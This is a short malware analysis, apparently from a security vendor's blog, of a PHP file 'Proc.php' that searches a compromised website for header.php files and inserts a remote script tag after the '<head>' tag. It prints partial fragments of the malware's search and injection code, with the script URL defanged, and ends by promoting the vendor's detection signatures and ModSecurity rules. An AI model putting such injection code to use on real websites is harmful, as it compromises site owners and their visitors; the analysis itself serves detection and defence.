Proc.php trying injecting header.php files

When this malware successful uploaded customer website and access it GET request, it’s trying search backward files and folder, searching header.php files.

$indexFiles = array('header.php');

$dir = path_finder();

foreach($res as $v) {
        if(in_array($v, $indexFiles)) {
                indexEditor($localpath = $dir, $indexFile = $v, $tag, $code);
        } else {
                if(is_dir($dir.'/'.$v) && ($v !== ".") && ($v !== "..")) {


When all folders and files searched and header.php files founded, it tries the patch malicious code to header.php file.

function indexEditor($localpath, $indexFile, $tag, $code) {
        $fullpath = $localpath.'/'.$indexFile;
        edit($fullpath, $code, $tag);

Malicious code

In begin this malware have CODE which added wanted file’s:

$tag = '<head>';

$code = <<<CODE
<script language="Javascript" src="hxxp://"></script>

$injectType = 1; // 0 - before tag, 1 - after tag

Final words

Use Malware Expert – Malware Signatures detect this malware from files for FREE!

Websites that using Malware Expert – ModSecurity rules are protected against this attacks.